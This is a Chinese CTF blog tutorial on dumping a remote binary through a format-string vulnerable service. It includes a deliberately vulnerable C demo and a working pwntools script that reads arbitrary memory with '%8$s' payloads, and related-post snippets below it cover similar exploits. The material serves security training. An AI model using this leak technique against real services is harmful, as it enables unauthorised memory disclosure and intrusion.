格式化字符串类盲pwn的dump方法

已于 2022-05-25 00:21:39 修改
阅读量546 收藏 4
点赞数
分类专栏: blind pwn 文章标签: pwn 安全 网络安全
于 2022-04-11 19:40:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124099384
版权

有一类题目,不会给任何文件,只给一个ip和端口,这种称为blind pwn(盲pwn),如果这类pwn存在格式化字符串漏洞的话,可以通过一些手法拿到整个二进制程序,这对我们的逆向分析和解题是十分重要的,举个例子:

在2022年的Insomni’hack teaser比赛上,有一道题CovidLe$s,就是一道盲pwn,输入什么就回显什么,但是存在格式化字符串漏洞,并且应该是栈上的,通过不断的尝试是可以大致猜测出栈结构的:
在这里插入图片描述
从偏移12开始是栈上的缓冲区,29那里是canary,31是返回地址,根据后三位可以猜到libc大版本

但是到这里也就结束了,无法继续推进了,此时就需要用到接下来将要介绍的方法,将整个程序dump下来才能继续分析

首先来看看dump下来的文件:
在这里插入图片描述

可以看到虽然不是很完整,但是大致的逻辑结构是能看到的,如果不dump下来的话,就不可能拿到这道题目的密钥,也就不可能做出来这道题,所以有些时候dump文件是必要的

dump的原理其实也很简单,其实就是利用格式化字符串的%n$p这类指令进行任意地址读

由于比赛已经结束,端口已经关闭,所以我们来自己写一个小demo:

#include<stdio.h>
#include<stdlib.h>
int main()
{
	setbuf(stdin, 0LL);
        setbuf(stdout, 0LL);
	setbuf(stderr, 0LL);
	char s[0x100];
	memset(s,0,0x100);
	while(1)
	{
		read(0,s,0x50);
		if(!strcmp(s,"Ayaka"))system("/bin/sh");
		printf(s);
	}
}

如果这是一道真实的题,那么Ayaka这个字符串如果不去dump文件,我们是不会得到的。

一开始我们要手工做一些准备工作:
在这里插入图片描述

可以看到我们偏移为6

我们要dump的东西是程序的text段,其起始位置在_start,所以我们要先把_start的地址确定下来

这里要利用一个特点,就是_start函数地址会在栈中出现多次,所以要先打印一部分栈空间,然后找到明显属于程序text段并且出现多次的地址,一般来说就是_start的地址

在这里插入图片描述
这里能看到0x400630明显是text段的地址,并且在42和57位置都出现了,所以这里应该就是_start()

接下来就是dump,在dump的时候可以直接用%s,因为%s是\x00截断,所以只要出现截断,直接当做是\x00,然后把地址+1即可

至于dump到哪里停止,可以把连续八字节的\x00当做结束标志

这个demo没有开pie,所以直接从0x400000开始dump就行

在这里插入图片描述

我这里顺带把0x600000那里也dump了一下,这个demo程序的结构比较简单,可以看到结果基本除了符号表之外都有,可以很清楚的看到程序结构

如果需要dump其他复杂一些的程序,可以只dump前面的,甚至只dump text段,都是可以解析出函数的,只不过可读性会差一些。

dump脚本如下:

from re import L
from pwn import *
from ctypes import *
from Ayaka import *
import base64
from Crypto.Util.number import *
#context.log_level = 'debug'
context.arch='amd64'
io = process('./test')
#io = remote('52.59.124.14',10200)
#libc = ELF('./libc-2.31.so')
#elf=ELF("./pwn")
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
start=0x400630
base=0x400000
data=0x600000
size=0x1000
TEXT=''
while True:
        if base>=0x401000 and base<data:
                TEXT+='\x00'
                base+=1
                continue
        io.sendline("LEAK---->%8$s|*|"+p64(base))
        ru("LEAK---->")
        s=io.recvuntil('|*|',drop=True)
        TEXT+=s
        base+=len(s)
        print(len(TEXT))
        if len(s)==0:
                TEXT+='\x00'
                base+=1
        if base>=0x601000:
                break
"""         if TEXT[-9:-1]=='\x00'*8  and base > start:
                break """
print("leak ",len(TEXT),"bytes successfully")
with open('dumpfile','wb') as f:
            f.write(TEXT)
#irt()
Ayakaaaa
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于读取popen输出结果时未截断字符串导致的命令行注入详解
12-31
比方说这道pwn题,就是调用system时,没有对输入数据进行\0截断以及对特殊字符处理不当而导致的。 命令行注入相对于其他二进制漏洞相比利用比较简单,比方说这道题,举个例子: sprintf(&s, du -sh lib/'%s', v
[pwn] 7.格式化字符串
H4ppyD0g的博客
09-01 565
a
noxCTF-pwn1-格式化字符串
Peanuts
09-09 559
格式化字符串 额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr from pwn import * context.log_level='debug' elf = ELF('./believeMe.dms') libc = elf.libc p = remote('18.223.228.52',13337) #p = pr...
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
最新发布
qq_66013948的博客
03-05 1039
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
Pwn 学习 格式化字符串
MrTreebook的博客
08-19 1350
每一种 pattern 的含义请具体参考维基百科的格式化字符串。以下几个 pattern 中的对应选择需要重点关注。可以看到%10p的作用是直接打印第十个%p位置上的指针内容。通过格式化字符串可以无限泄露栈上的数据。
菜鸟PWN手进阶之格式化字符串
re1wn
01-05 6467
菜鸟PWN手进阶之格式化字符串
[pwn]格式化字符串:0ctf 2015 login writeup
Breeze的博客
09-26 9094
文章目录格式化字符串:0ctf 2015 login writeup格式化字符串漏洞题目分析利用思路开始利用 格式化字符串:0ctf 2015 login writeup 格式化字符串漏洞 格式化字符串漏洞是不正确的使用printf函数导致的,为了简便使用printf(s),而s是用户可控的字符串,就会导致任意地址读和任意地址写漏洞。**归根结底,由于printf的参数个数是不确定的,而函数本身根...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
02-linux pwn入门学习到放弃.pdf
09-20
02-linux pwn入门学习到放弃.pdf
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN2PLY:从PWN格式到PLY格式的转换器-matlab开发
05-30
PWN2PLY 是一个 GUI 应用程序,专门用于将 PWN 文件转换为 PLY 格式。 该应用程序应用一种算法来构建一个网格,可记录为 PLY 格式(多边形,更准确地说是三角形),从一组法线和 PWN 文件的应用点(带法线的点)。 ...
pwn学习-格式化字符串的利用
WocW的博客
03-08 1928
覆盖栈内存 所用例子 /* example/overflow/overflow.c */ #include &lt;stdio.h&gt; int a = 123, b = 456; int main() { int c = 789; char s[100]; printf("%p\n", &amp;c); scanf("%s", s); printf(s); if...
PWN入门(8)格式化字符串漏洞
Ba1_Ma0的博客
09-26 826
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入07文件夹还是和上一篇文件一样,设置文件权限,将flag设置位只能root可读设置程序位suid位。
pwn格式化字符串漏洞小结
PLpa的博客
11-30 2358
格式化字符串漏洞 0x00.前言 在pwn中,格式化字符串漏洞是一个非常基础的漏洞,他通常穿插在各种漏洞之中。比如,当程序开了PIE保护时,在栈溢出之前,我们先可以运用格式化字符串漏洞获取栈中的信息;通过格式化字符串漏洞的任意地址写,我们可以把栈帧劫持到堆地址上;我们甚至可以直接通过任意地址写,劫持got表,实现getshell…… 总而言之,格式化字符串漏洞虽然在目前市面上的软件中比较难以看到,...
动态顺序字符串基本操作实验_Blind_pwn格式化字符串
weixin_39993989的博客
11-07 91
作者:SkYe合天智汇可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串打指的是只给出可交互的 ip 地址与端口,不给出对应的 binary 文件来让我们无法通过 IDA 分析,其实这个和 BROP 差不多,不过 BROP 利用的是栈溢出,而这里我们利用的是无限格式化字符串漏洞,把在内存中的程序给dump下来。一般来说,我们...
pwn 格式化字符串漏洞及例题
limenzzz的博客
10-21 1737
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
PWN基础5:格式化字符串漏洞(一) 概述 及 调试
prettyX的博客
07-09 701
漏洞概述 在C语言中,常用的输出函数有printf、fprintf、vprintf、vfprintf、sprintf等。对于这些输出函数,Format String是其第一个参数,一般称之为格式化字符串 格式化字符串在输出函数中的解析过程: ...
pwn格式化字符串的浅显理解
javagty6778的博客
03-19 189
这时候可以输入格式化字符 %d,%p等控制函数的输出。2.### 简单解释格式化字符串原理1.这是两段程序的源码:* 1️⃣。2.对应的汇编代码:* 1️⃣。
CTF pwn题之格式化字符串漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值